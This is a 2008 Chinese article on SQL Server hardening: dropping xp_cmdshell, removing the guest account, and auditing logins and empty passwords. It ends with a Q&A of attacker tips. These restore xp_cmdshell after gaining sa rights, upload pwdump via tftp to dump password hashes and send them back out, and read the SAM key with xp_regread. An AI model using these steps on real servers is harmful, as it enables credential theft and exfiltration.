从IIS到SQL Server数据库安全(3)
作者:佚名 来源:中国IT实验室 发布时间:2008-12-24 15:58:00
首先,你需要加强象sa这样的帐号的密码,跟系统帐号的使用配置相似,一般操作数据库不要使用象sa这样的最高权限的帐号,而使用能满足你的要求的一般帐号。
接着对扩展存储过程开始 * ,首先就是xp_cmdshell,还有就是上面那些一大堆存储过程,都drop吧,一般也用不着。
执行:
use master
sp_dropextendedproc ’xp_cmdshell’
去掉guest帐号,阻止非授权用户访问。
去掉不必要的网络协议。
加强对数据库登陆的日志记录,最好记录所有登陆事件。可以用下面的简单DOS命令来查看日志:
findstr /C:"登录" d:\Microsoft SQL Server\MSSQL\LOG\*.*
用管理员帐号定期检查所有帐号,是否密码为空或者过于简单,比如下面的语句:
Use master
Select name,Password from syslogins where password is null
用下面语句对所有帐号,检查对存储过程和扩展存储过程的执行权,提防不必要的执行权限扩散:
Use master
Select sysobjects.name From sysobjects,
sysprotects Where sysprotects.uid = 0
AND xtype IN (’X’,’P’) AND sysobjects.id = sysprotects.id
加强数据库的安全是非常重要的,有的数据库服务器是和WEB服务器隔离开的,这就同MAIL服务器一样,数据库的日志可能就基本很少去查看,这将会成为管理员的一个疏忽点。类似DNS、MAIL等等,数据库服务器往往成为各种入侵的跳板。
下面是一些关于数据库的问答和技巧:
1、获得SA权限后,却不能执行xp_cmdshell存储过程怎么办?
答:可能是已经把xp_cmdshell等扩展存储过程删除了,可以用这个存储过程把xp_cmdshell恢复。
sp_addextendedproc ’xp_cmdshell’, ’xpsql70.dll’
2、通过数据库用pwdump获得系统管理员密码
先上传一个pwdump
tftp -i GET pwdump3.exe pwdump3.exe
tftp -i GET lsaext.dll lsaext.dll
tftp -i GET pwservice.exe pwservice.exe
pwdump3 127.0.0.1 outfile.txt
tftp PUT outfile.txt outfile.txt
然后再用解密工具l0pht等等破解这些密码。
3、从数据库读取系统管理员密码
能读出加密的密码是NT的"administrator"帐号也不能做的,SQL Server能读出来是使用的“LocalSystem”帐号,这个帐号比administrator更高一级。可以使用下面这个存储过程。不过读出来的密码是经过加密后的,然后再解密吧。
xp_regread ’HKEY_LOCAL_MACHINE’,’SECURITY\SAM\Domains\Account’,’F’
当然,数据库安全和缺陷还有很多,还需要更多的研究。我对数据库的学习还是起步阶段,限于自己的水平,上面的难免有错,欢迎大家指正和指教。如果你有更多关于数据库的安全资料或者疑问,欢迎联系我,Email: dongjw#staff.ccidnet.com (请将"#"改为"@")
猜你喜欢
- 1. position:static所有元素的默认定位都是:position:static,这意味着元素没有被定位,而且在文档中出现在它应该
- MySQL目前不支持列的Default 为函数的形式,如达到你某列的默认值为当前更新日期与时间的功能,你可以使用TIMESTAMP列类型下面
- 我们工作中经常需要将数据转化成柱状图,饼图等,以方便直观的分析数据, 这里给大家介绍一个ASP中制作饼图、柱状图的组件:csDra
- 很简单的一个函数,就是根据当前的日期生成一个随机数。<% Function getRnd() '**********
- caller 属性返回一个对函数的引用,该函数调用了当前函数。functionName.caller functionName 对象是所执行
- 在oracle数据库的开发中,常因为时间的问题大费周章,所以特地将ORACLE数据的日期函数收藏致此。乃供他日所查也。 add_months
- <% Rem Rem ## 在线升级类声明 Class Cls_oUpdate
- 以前大家谈了很多有关打开数据库连接安全的问题,现在我再提出一种思路:使用activex dll来保护你的代码。(既可以不用为使用共享的加密软
- 使用MySQL,安全问题不能不注意。以下是MySQL提示的23个注意事项:1.如果客户端和服务器端的连接需要跨越并通过不可信任的网络,那么就
- 斐波那契记忆优化法:<script type="text/javascript">var fibonacci
- 例如:我们在百度中搜索 词典网,则网址后面的参数就是http://www.baidu.com/s?cl=3&wd=%B4%CA%B5
- 随着JS与XHTML的应用普及,越来越多的web界面应用技术出现在网站上,比如我们常见的日历控件,搜索下拉框等,这些web界面应用技术大大的
- 这里是一个基于GMap2和XML的小例子,数据存在XML文件中 ,这是最简单的模式,却相当地有用。实例的网址是: http://sunjia
- 从我们论坛中收集了这段HTML制作页面需要最大化、最小化时可以借鉴参考。最大化效果:<OBJECT id="max
- MySQL是一个跨平台的开源关系型数据库管理系统,是我们常用的最经济实惠的数据库,由于其体积小、速度快、总体拥有成本低,尤其是开放源码这一特
- 有三种主要的错误类型: 1.编译错误: 这种错误出现一般都是代码的语法问题。因为编译错误而导致辞ASP停止运行。 2.运行错误: 这个错误是
- 1 引言 在关系数据库(DB2,Oracle,Sybase,Informix和SQL Server)最小的恢复和交易单位为一个事务(Tran
- 本文回答了如下问题:“MySQL服务器有多稳定?”,以及“在本项目中我能依靠My
- 这是 COMSHARP CMS 团队翻译的2009年海外Web设计风潮的第二部分,着重讲解了反 Box 式布局,单页布局,多栏布局,巨型插图
- 讲这个方法之前,我们应该先了解下插入节点时浏览器会做什么。在浏览器中,我们一旦把节点添加到document.body(或者其他节点)中,页面